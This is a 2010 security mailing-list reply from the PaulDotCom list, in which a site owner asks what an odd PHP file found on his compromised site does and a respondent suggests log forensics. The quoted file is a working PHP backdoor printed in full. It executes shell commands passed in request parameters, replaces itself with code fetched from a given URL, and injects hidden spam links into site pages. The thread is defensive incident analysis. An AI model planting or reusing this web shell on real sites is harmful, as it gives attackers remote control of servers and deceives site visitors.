PaulDotCom mailing list archives
Odd PHP file, trying to find out what it does
From: jim.halfpenny at gmail.com (Jim Halfpenny)
Date: Mon, 1 Mar 2010 16:31:46 +0000
A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum thread with some info on this file: http://www.webhostingtalk.com/showthread.php?t=876121 I'm sure there are other sources of info out there. Time for some forensic analysis of your logs to work out how and when this got here. I'm guessing an automated attack against a known vuln in a PHP app? Jim On 1 March 2010 09:16, Adrian Crenshaw <irongeek at irongeek.com> wrote:
Ok, I think one of my sites may have been compromised. I found the following PHP script on a site, but I'm not sure what it is trying to do. Anyone else ever seen this script before? Adrian <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.htm"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { $thisname = "1.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function UpKos() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><sdioyslkjs2> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fp = fopen($mpt, "r"); GetVar("drs", $drs); $fin = $fin.$begtag; $drs = str_replace("\\", "", $drs); $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['uk']) || isset($_GET['uk'])) { UpKos(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } echo "<ok>"; } Main(); ?> _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20100301/26277beb/attachment.htm
Current thread:
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does David Hoelzer (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
- Odd PHP file, trying to find out what it does Bradley McMahon (Mar 01)
- Odd PHP file, trying to find out what it does Dimitrios Kapsalis (Mar 01)
- Odd PHP file, trying to find out what it does Jim Halfpenny (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)